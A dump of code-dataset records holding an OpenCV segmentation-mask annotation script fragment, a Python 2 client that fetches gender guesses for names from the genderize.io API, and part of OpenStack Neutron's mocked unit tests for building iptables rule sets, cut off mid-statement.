kernel_size = cv2.getTrackbarPos("kernel_size", "draw_img")
pixel_threshold = cv2.getTrackbarPos("threshold", "draw_img")
cv2.imshow('draw_img', draw_img)
cv2.setMouseCallback('draw_img', onMouse,[draw_img, draw_result ,x, y, kernel_size, pixel_threshold])
# cv2.waitKey(0)
cv2.destroyAllWindows()
result = np.where(draw_result == 2, 2, result)
cv2.namedWindow("result")
cv2.moveWindow("result", 800, 400)
cv2.imshow('result', result.copy() * 127)
cv2.waitKey(0)
key = cv2.waitKey(0)
cv2.destroyAllWindows()
delete_idx = abs(48 - key)
    # Chose not to save
if delete_idx == 65:
continue
    # Chose to save
    # when the '1' key is pressed (ord('1') == 49)
if key == 49:
print('save')
cv2.imwrite(ROI_INPUT_PATH +str(i) +'_rgb.png', original[y:y+h, x:x+w])
cv2.imwrite(ROI_GT_PATH +str(i) +'_semantic_mask.png', result[y:y+h, x:x+w])
cv2.imwrite(ROI_CHECK_GT_PATH +str(i) +'_semantic_mask.png', result[y:y+h, x:x+w] * 127)
cv2.imwrite(SEMANTIC_INPUT_PATH +str(i) +'_rgb.png', original)
cv2.imwrite(SEMANTIC_GT_PATH +str(i) +'_semantic_mask.png', result)
cv2.imwrite(SEMANTIC_CHECK_GT_PATH +str(i) +'_semantic_mask.png', result* 127)
i += 1
| 31.315068
| 159
| 0.618985
|
4a1457180213e69c159e5e5a8f45930341d516c7
| 2,405
|
py
|
Python
|
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | 1
|
2015-04-09T21:25:12.000Z
|
2015-04-09T21:25:12.000Z
|
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | null | null | null |
gender.py
|
sillyfellow/gender.py
|
77f8c57fa7d9847c872867b6d384995616bdbdd1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import requests
import json
import sys
import shelve
def fill_gender_db(names, db):
""" call the genderize.io api and then fill in the details
to a local db, a shelf """
url = ""
cnt = 0
for name in names:
if url == "":
url = "name[0]=" + name
else:
url = url + "&name[" + str(cnt) + "]=" + name
cnt += 1
req = requests.get("http://api.genderize.io?" + url)
parse_json_to_db(json.loads(req.text), db)
def parse_json_to_db(data, db):
for item in data:
parse_json_item_to_db(item, db)
def parse_json_item_to_db(item, db):
""" shelves cannot have unicode keys, so keep the latinized version """
name = item["name"]
values = []
if item["gender"] is not None:
values = [name, item["gender"],
float(item["probability"]), int(item["count"])]
else:
values = [name, u'None', u'0.0', 0.0]
db[name.encode('latin_1')] = values
def chunks(l, n):
for i in xrange(0, len(l), n):
yield l[i:i + n]
def create_gender_db(names_file, database="names_gender.db", chunk_size=20):
"""
read names from the file, call the api, fill the db (shelf)
"""
fd = open(names_file, "r")
db = shelve.open(database)
# If the name is already in the db, then don't check for it
names = [name.strip() for name in fd.readlines()
if name.strip().encode('latin_1') not in db]
for name_chunk in chunks(names, chunk_size):
fill_gender_db(name_chunk, db)
fd.close()
db.close()
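# Usage sketch (the file name is hypothetical): a plain-text file with one
# first name per line is enough, e.g.
#
#   create_gender_db("names.txt")   # queries api.genderize.io in chunks of 20
#   read_gender_db()                # prints "Frau/Herr <name>, <probability>"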
def salute(gender):
if gender == u'female':
return u'Frau '
return u'Herr '
def read_gender_db(database="names_gender.db"):
"""
read the database (only the values)
sort them based on the probability of being correct
and print them out with the salutation
"""
db = shelve.open(database)
result = []
for value in db.itervalues():
result.append(value)
result = sorted(result, key=lambda x: x[2], reverse=True)
output = [salute(x[1]) + x[0] + ', ' + unicode(x[2])
for x in result]
for person in output:
print person
db.close()
if __name__ == '__main__':
args = sys.argv
if len(args) == 2:
create_gender_db(args[1])
read_gender_db()
else:
print "Usage: ", args[0], " <file-with-names>"
| 25.052083
| 76
| 0.585447
|
4a1457c07b7bb10db7002886c5912ec369e36989
| 42,130
|
py
|
Python
|
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | 5
|
2015-10-20T07:56:53.000Z
|
2017-12-31T22:39:15.000Z
|
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/agent/linux/test_iptables_manager.py
|
aristanetworks/neutron
|
84d2638579dc92b8530ccc3e963ce0e80c36461e
|
[
"Apache-2.0"
] | 3
|
2015-05-08T22:36:28.000Z
|
2015-10-24T21:25:35.000Z
|
# Copyright 2012 Locaweb.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import mock
from oslo_config import cfg
import testtools
from neutron.agent.linux import iptables_comments as ic
from neutron.agent.linux import iptables_manager
from neutron.common import exceptions as n_exc
from neutron.tests import base
from neutron.tests import tools
IPTABLES_ARG = {'bn': iptables_manager.binary_name,
'snat_out_comment': ic.SNAT_OUT,
'filter_rules': ''}
NAT_TEMPLATE = ('# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat\n'
'[0:0] -A %(bn)s-snat -j '
'%(bn)s-float-snat\n'
'COMMIT\n'
'# Completed by iptables_manager\n')
NAT_DUMP = NAT_TEMPLATE % IPTABLES_ARG
FILTER_TEMPLATE = ('# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'COMMIT\n'
'# Completed by iptables_manager\n')
FILTER_DUMP = FILTER_TEMPLATE % IPTABLES_ARG
FILTER_WITH_RULES_TEMPLATE = (
'# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-filter - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'%(filter_rules)s'
'COMMIT\n'
'# Completed by iptables_manager\n')
COMMENTED_NAT_DUMP = (
'# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat '
'-m comment --comment "%(snat_out_comment)s"\n'
'[0:0] -A %(bn)s-snat -j '
'%(bn)s-float-snat\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % IPTABLES_ARG)
TRAFFIC_COUNTERS_DUMP = (
'Chain OUTPUT (policy ACCEPT 400 packets, 65901 bytes)\n'
' pkts bytes target prot opt in out source'
' destination \n'
' 400 65901 chain1 all -- * * 0.0.0.0/0'
' 0.0.0.0/0 \n'
' 400 65901 chain2 all -- * * 0.0.0.0/0'
' 0.0.0.0/0 \n')
class IptablesTestCase(base.BaseTestCase):
def test_get_binary_name_in_unittest(self):
# Corresponds to sys.argv content when running python -m unittest class
with mock.patch('sys.argv', ['python -m unittest', 'class']):
binary_name = iptables_manager.get_binary_name()
self.assertEqual('python_-m_unitte', binary_name)
class IptablesCommentsTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesCommentsTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', True, 'AGENT')
self.iptables = iptables_manager.IptablesManager()
self.execute = mock.patch.object(self.iptables, "execute").start()
def test_comments_short_enough(self):
for attr in dir(ic):
if not attr.startswith('__') and len(getattr(ic, attr)) > 255:
self.fail("Iptables comment %s is longer than 255 characters."
% attr)
def test_add_filter_rule(self):
iptables_args = {}
iptables_args.update(IPTABLES_ARG)
filter_rules = ('[0:0] -A %(bn)s-filter -j DROP\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(bn)s-filter\n' % iptables_args)
iptables_args['filter_rules'] = filter_rules
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(IPTABLES_ARG)
mangle_dump = _generate_mangle_dump(IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + COMMENTED_NAT_DUMP +
mangle_dump + filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + COMMENTED_NAT_DUMP +
mangle_dump + FILTER_DUMP),
run_as_root=True
),
None),
]
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter' % IPTABLES_ARG)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter'
% IPTABLES_ARG)
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def _generate_mangle_dump(iptables_args):
return ('# Generated by iptables_manager\n'
'*mangle\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-mark - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A %(bn)s-PREROUTING -j %(bn)s-mark\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % iptables_args)
def _generate_raw_dump(iptables_args):
return ('# Generated by iptables_manager\n'
'*raw\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'COMMIT\n'
'# Completed by iptables_manager\n' % iptables_args)
MANGLE_DUMP = _generate_mangle_dump(IPTABLES_ARG)
RAW_DUMP = _generate_raw_dump(IPTABLES_ARG)
class IptablesManagerStateFulTestCase(base.BaseTestCase):
def setUp(self):
super(IptablesManagerStateFulTestCase, self).setUp()
cfg.CONF.set_override('comment_iptables_rules', False, 'AGENT')
self.iptables = iptables_manager.IptablesManager()
self.execute = mock.patch.object(self.iptables, "execute").start()
def test_binary_name(self):
expected = os.path.basename(sys.argv[0])[:16]
self.assertEqual(expected, iptables_manager.binary_name)
def test_get_chain_name(self):
name = '0123456789' * 5
# 28 chars is the maximum length of iptables chain name.
self.assertEqual(iptables_manager.get_chain_name(name, wrap=False),
name[:28])
# 11 chars is the maximum length of chain name of iptable_manager
# if binary_name is prepended.
self.assertEqual(iptables_manager.get_chain_name(name, wrap=True),
name[:11])
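        # Illustrative follow-on (see the wrap target helper further below):
        # wrapped names are later rendered as '<binary_name>-<11-char name>'.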
def test_defer_apply_with_exception(self):
self.iptables._apply = mock.Mock(side_effect=Exception)
with testtools.ExpectedException(n_exc.IpTablesApplyException):
with self.iptables.defer_apply():
pass
def _extend_with_ip6tables_filter(self, expected_calls, filter_dump):
expected_calls.insert(2, (
mock.call(['ip6tables-save', '-c'],
run_as_root=True),
''))
expected_calls.insert(3, (
mock.call(['ip6tables-restore', '-c'],
process_input=filter_dump,
run_as_root=True),
None))
expected_calls.extend([
(mock.call(['ip6tables-save', '-c'],
run_as_root=True),
''),
(mock.call(['ip6tables-restore', '-c'],
process_input=filter_dump,
run_as_root=True),
None)])
def _test_add_and_remove_chain_custom_binary_name_helper(self, use_ipv6):
bn = ("abcdef" * 5)
self.iptables = iptables_manager.IptablesManager(
binary_name=bn,
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {'bn': bn[:16], 'filter_rules': ''}
filter_dump = FILTER_WITH_RULES_TEMPLATE % iptables_args
filter_dump_ipv6 = FILTER_TEMPLATE % iptables_args
filter_dump_mod = filter_dump
nat_dump = NAT_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(iptables_args)
mangle_dump = _generate_mangle_dump(iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
filter_dump_ipv6)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.apply()
self.iptables.ipv4['filter'].empty_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_and_remove_chain_custom_binary_name(self):
self._test_add_and_remove_chain_custom_binary_name_helper(False)
def test_add_and_remove_chain_custom_binary_name_with_ipv6(self):
self._test_add_and_remove_chain_custom_binary_name_helper(True)
def _test_empty_chain_custom_binary_name_helper(self, use_ipv6):
bn = ("abcdef" * 5)[:16]
self.iptables = iptables_manager.IptablesManager(
binary_name=bn,
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {'bn': bn}
filter_dump = FILTER_TEMPLATE % iptables_args
filter_rules = ('[0:0] -A %(bn)s-filter -s 0/0 -d 192.168.0.2\n'
% iptables_args)
iptables_args['filter_rules'] = filter_rules
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
nat_dump = NAT_TEMPLATE % iptables_args
raw_dump = _generate_raw_dump(iptables_args)
mangle_dump = _generate_mangle_dump(iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump + nat_dump + mangle_dump +
filter_dump),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
filter_dump)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter',
'-s 0/0 -d 192.168.0.2')
self.iptables.apply()
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_empty_chain_custom_binary_name(self):
self._test_empty_chain_custom_binary_name_helper(False)
def test_empty_chain_custom_binary_name_with_ipv6(self):
self._test_empty_chain_custom_binary_name_helper(True)
def _test_add_and_remove_chain_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % IPTABLES_ARG
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.apply()
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_and_remove_chain(self):
self._test_add_and_remove_chain_helper(False)
def test_add_and_remove_chain_with_ipv6(self):
self._test_add_and_remove_chain_helper(True)
def _test_add_filter_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
iptables_args = {}
iptables_args.update(IPTABLES_ARG)
filter_rules = ('[0:0] -A %(bn)s-filter -j DROP\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(bn)s-filter\n' % iptables_args)
iptables_args['filter_rules'] = filter_rules
filter_dump_mod = FILTER_WITH_RULES_TEMPLATE % iptables_args
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True
),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain('filter')
self.iptables.ipv4['filter'].add_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter' % IPTABLES_ARG)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('filter', '-j DROP')
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' %(bn)s-filter'
% IPTABLES_ARG)
self.iptables.ipv4['filter'].remove_chain('filter')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_filter_rule(self):
self._test_add_filter_rule_helper(False)
def test_add_filter_rule_with_ipv6(self):
self._test_add_filter_rule_helper(True)
def _test_rule_with_wrap_target_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
name = '0123456789' * 5
wrap = "%s-%s" % (iptables_manager.binary_name,
iptables_manager.get_chain_name(name))
iptables_args = {'bn': iptables_manager.binary_name,
'wrap': wrap}
filter_dump_mod = ('# Generated by iptables_manager\n'
'*filter\n'
':neutron-filter-top - [0:0]\n'
':%(wrap)s - [0:0]\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-local - [0:0]\n'
'[0:0] -A FORWARD -j neutron-filter-top\n'
'[0:0] -A OUTPUT -j neutron-filter-top\n'
'[0:0] -A neutron-filter-top -j %(bn)s-local\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A %(bn)s-INPUT -s 0/0 -d 192.168.0.2 -j '
'%(wrap)s\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% iptables_args)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
filter_dump_mod),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['filter'].add_chain(name)
self.iptables.ipv4['filter'].add_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' $%s' % name)
self.iptables.apply()
self.iptables.ipv4['filter'].remove_rule('INPUT',
'-s 0/0 -d 192.168.0.2 -j'
' $%s' % name)
self.iptables.ipv4['filter'].remove_chain(name)
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_rule_with_wrap_target(self):
self._test_rule_with_wrap_target_helper(False)
def test_rule_with_wrap_target_with_ipv6(self):
self._test_rule_with_wrap_target_helper(True)
def _test_add_mangle_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
mangle_dump_mod = (
'# Generated by iptables_manager\n'
'*mangle\n'
':%(bn)s-FORWARD - [0:0]\n'
':%(bn)s-INPUT - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-mangle - [0:0]\n'
':%(bn)s-mark - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A INPUT -j %(bn)s-INPUT\n'
'[0:0] -A FORWARD -j %(bn)s-FORWARD\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A %(bn)s-PREROUTING -j %(bn)s-mark\n'
'[0:0] -A %(bn)s-PREROUTING -j MARK --set-xmark 0x1/0xffffffff\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + mangle_dump_mod +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['mangle'].add_chain('mangle')
self.iptables.ipv4['mangle'].add_rule(
'PREROUTING',
'-j MARK --set-xmark 0x1/0xffffffff')
self.iptables.apply()
self.iptables.ipv4['mangle'].remove_rule(
'PREROUTING',
'-j MARK --set-xmark 0x1/0xffffffff')
self.iptables.ipv4['mangle'].remove_chain('mangle')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_mangle_rule(self):
self._test_add_mangle_rule_helper(False)
def test_add_mangle_rule_with_ipv6(self):
self._test_add_mangle_rule_helper(True)
def _test_add_nat_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
nat_dump = NAT_TEMPLATE % IPTABLES_ARG
nat_dump_mod = ('# Generated by iptables_manager\n'
'*nat\n'
':neutron-postrouting-bottom - [0:0]\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-POSTROUTING - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-float-snat - [0:0]\n'
':%(bn)s-nat - [0:0]\n'
':%(bn)s-snat - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A POSTROUTING -j %(bn)s-POSTROUTING\n'
'[0:0] -A POSTROUTING -j neutron-postrouting-bottom\n'
'[0:0] -A neutron-postrouting-bottom -j %(bn)s-snat\n'
'[0:0] -A %(bn)s-snat -j %(bn)s-float-snat\n'
'[0:0] -A %(bn)s-PREROUTING -d 192.168.0.3 -j '
'%(bn)s-nat\n'
'[0:0] -A %(bn)s-nat -p tcp --dport 8080 -j '
'REDIRECT --to-port 80\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + nat_dump_mod + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + nat_dump + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['nat'].add_chain('nat')
self.iptables.ipv4['nat'].add_rule('PREROUTING',
'-d 192.168.0.3 -j '
'%(bn)s-nat' % IPTABLES_ARG)
self.iptables.ipv4['nat'].add_rule('nat',
'-p tcp --dport 8080' +
' -j REDIRECT --to-port 80')
self.iptables.apply()
self.iptables.ipv4['nat'].remove_rule('nat',
'-p tcp --dport 8080 -j'
' REDIRECT --to-port 80')
self.iptables.ipv4['nat'].remove_rule('PREROUTING',
'-d 192.168.0.3 -j '
'%(bn)s-nat' % IPTABLES_ARG)
self.iptables.ipv4['nat'].remove_chain('nat')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_nat_rule(self):
self._test_add_nat_rule_helper(False)
def test_add_nat_rule_with_ipv6(self):
self._test_add_nat_rule_helper(True)
def _test_add_raw_rule_helper(self, use_ipv6):
self.iptables = iptables_manager.IptablesManager(
use_ipv6=use_ipv6)
self.execute = mock.patch.object(self.iptables, "execute").start()
raw_dump_mod = ('# Generated by iptables_manager\n'
'*raw\n'
':%(bn)s-OUTPUT - [0:0]\n'
':%(bn)s-PREROUTING - [0:0]\n'
':%(bn)s-raw - [0:0]\n'
'[0:0] -A PREROUTING -j %(bn)s-PREROUTING\n'
'[0:0] -A OUTPUT -j %(bn)s-OUTPUT\n'
'[0:0] -A %(bn)s-PREROUTING -j CT --notrack\n'
'COMMIT\n'
'# Completed by iptables_manager\n'
% IPTABLES_ARG)
expected_calls_and_values = [
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(raw_dump_mod + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
(mock.call(['iptables-save', '-c'],
run_as_root=True),
''),
(mock.call(['iptables-restore', '-c'],
process_input=(RAW_DUMP + NAT_DUMP + MANGLE_DUMP +
FILTER_DUMP),
run_as_root=True),
None),
]
if use_ipv6:
self._extend_with_ip6tables_filter(expected_calls_and_values,
FILTER_DUMP)
tools.setup_mock_calls(self.execute, expected_calls_and_values)
self.iptables.ipv4['raw'].add_chain('raw')
self.iptables.ipv4['raw'].add_rule('PREROUTING',
'-j CT --notrack')
self.iptables.apply()
self.iptables.ipv4['raw'].remove_rule('PREROUTING',
'-j CT --notrack')
self.iptables.ipv4['raw'].remove_chain('raw')
self.iptables.apply()
tools.verify_mock_calls(self.execute, expected_calls_and_values)
def test_add_raw_rule(self):
self._test_add_raw_rule_helper(False)
def test_add_raw_rule_with_ipv6(self):
self._test_add_raw_rule_helper(True)
def test_add_rule_to_a_nonexistent_chain(self):
self.assertRaises(LookupError, self.iptables.ipv4['filter'].add_rule,
